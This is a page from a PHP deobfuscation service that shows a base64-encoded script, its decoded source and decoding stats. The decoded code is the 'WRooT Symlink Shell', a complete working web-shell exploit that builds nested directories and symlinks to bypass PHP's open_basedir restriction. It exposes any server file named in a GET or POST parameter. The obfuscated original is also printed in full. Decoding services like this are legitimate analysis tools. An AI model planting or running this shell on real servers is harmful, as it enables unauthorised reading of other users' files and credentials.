Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

echo(base64_decode('JGZha2VkaXI9ImN4IjsKJGZha2VkZXA9MTY7CgokbnVtPTA7IC8vIG9mZnNldCBvZiBzeW..

Decoded Output download

b'$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET[\'file\'])) $file=$_GET[\'file\'];
else if(!empty($_POST[\'file\'])) $file=$_POST[\'file\'];
else $file="";

echo \'<PRE><img
src="http://img810.imageshack.us/img810/8043/webr00t12.png"><P>WRooT Symlink Shell <a
href="http://webr00t.info/"></a>
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>Daha Fazlas1: <a href="http://webr00t.info/">WRooT</a>
<p><form name="form"
 action="?webr00t=symlink&bypass=cp" method="post"><input type="text" name="file" size="50"
value="\'.htmlspecialchars($file).\'"><input type="submit" name="hym"
value="Create Symlink"></form>\';

if(empty($file))
    exit;

if(!is_writable("."))
    die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
        mkdir($fakedir);
    chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $as++;
    }
}
$as++;
while($as--)
    chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
    else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die(\'<FONT COLOR="RED">check symlink <a
href="./symlink\'.$num.\'">symlink\'.$num.\'</a> file</FONT>\');'

Did this file decode correctly?

Original Code

echo(base64_decode('JGZha2VkaXI9ImN4IjsKJGZha2VkZXA9MTY7CgokbnVtPTA7IC8vIG9mZnNldCBvZiBzeW1saW5r
LiRudW0KCmlmKCFlbXB0eSgkX0dFVFsnZmlsZSddKSkgJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKZWxz
ZSBpZighZW1wdHkoJF9QT1NUWydmaWxlJ10pKSAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKZWxzZSAk
ZmlsZT0iIjsKCmVjaG8gJzxQUkU+PGltZwpzcmM9Imh0dHA6Ly9pbWc4MTAuaW1hZ2VzaGFjay51
cy9pbWc4MTAvODA0My93ZWJyMDB0MTIucG5nIj48UD5Xo99Sb29UIFN5bWxpbmsgU2hlbGwgPGEK
aHJlZj0iaHR0cDovL3dlYnIwMHQuaW5mby8iPjwvYT4KPHA+UEhQIDUuMi4xMSA1LjMuMCBzeW1s
aW5rIG9wZW5fYmFzZWRpciBieXBhc3MKPHA+RGFoYSBGYXpsYXMxOiA8YSBocmVmPSJodHRwOi8v
d2VicjAwdC5pbmZvLyI+V6PfUm9vVDwvYT4KPHA+PGZvcm0gbmFtZT0iZm9ybSIKIGFjdGlvbj0i
P3dlYnIwMHQ9c3ltbGluayZieXBhc3M9Y3AiIG1ldGhvZD0icG9zdCI+PGlucHV0IHR5cGU9InRl
eHQiIG5hbWU9ImZpbGUiIHNpemU9IjUwIgp2YWx1ZT0iJy5odG1sc3BlY2lhbGNoYXJzKCRmaWxl
KS4nIj48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJoeW0iCnZhbHVlPSJDcmVhdGUgU3ltbGlu
ayI+PC9mb3JtPic7CgppZihlbXB0eSgkZmlsZSkpCiAgICBleGl0OwoKaWYoIWlzX3dyaXRhYmxl
KCIuIikpCiAgICBkaWUoIm5vdCB3cml0YWJsZSBkaXJlY3RvcnkiKTsKCiRsZXZlbD0wOwoKZm9y
KCRhcz0wOyRhczwkZmFrZWRlcDskYXMrKyl7CiAgICBpZighZmlsZV9leGlzdHMoJGZha2VkaXIp
KQogICAgICAgIG1rZGlyKCRmYWtlZGlyKTsKICAgIGNoZGlyKCRmYWtlZGlyKTsKfQoKd2hpbGUo
MTwkYXMtLSkgY2hkaXIoIi4uIik7CgokaGFyZHN0eWxlID0gZXhwbG9kZSgiLyIsICRmaWxlKTsK
CmZvcigkYT0wOyRhPGNvdW50KCRoYXJkc3R5bGUpOyRhKyspewogICAgaWYoIWVtcHR5KCRoYXJk
c3R5bGVbJGFdKSl7CiAgICAgICAgaWYoIWZpbGVfZXhpc3RzKCRoYXJkc3R5bGVbJGFdKSkgCiAg
ICAgICAgICAgIG1rZGlyKCRoYXJkc3R5bGVbJGFdKTsKICAgICAgICBjaGRpcigkaGFyZHN0eWxl
WyRhXSk7CiAgICAgICAgJGFzKys7CiAgICB9Cn0KJGFzKys7CndoaWxlKCRhcy0tKQogICAgY2hk
aXIoIi4uIik7CgpAcm1kaXIoImZha2VzeW1saW5rIik7CkB1bmxpbmsoImZha2VzeW1saW5rIik7
CgpAc3ltbGluayhzdHJfcmVwZWF0KCRmYWtlZGlyLiIvIiwkZmFrZWRlcCksImZha2VzeW1saW5r
Iik7CgovLyB0aGlzIGxvb3Agd2lsbCBza2lwIGFsbHJlYWR5IGNyZWF0ZWQgc3ltbGlua3MuCndo
aWxlKDEpCiAgICBpZih0cnVlPT0oQHN5bWxpbmsoImZha2VzeW1saW5rLyIuc3RyX3JlcGVhdCgi
Li4vIiwkZmFrZWRlcC0xKS4kZmlsZSwKInN5bWxpbmsiLiRudW0pKSkgYnJlYWs7CiAgICBlbHNl
ICRudW0rKzsKCkB1bmxpbmsoImZha2VzeW1saW5rIik7Cm1rZGlyKCJmYWtlc3ltbGluayIpOwoK
ZGllKCc8Rk9OVCBDT0xPUj0iUkVEIj5jaGVjayBzeW1saW5rIDxhCmhyZWY9Ii4vc3ltbGluaycu
JG51bS4nIj5zeW1saW5rJy4kbnVtLic8L2E+IGZpbGU8L0ZPTlQ+Jyk7'));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 edfa147d47f5fa10f60e87d23f9aa747
Eval Count 0
Decode Time 42 ms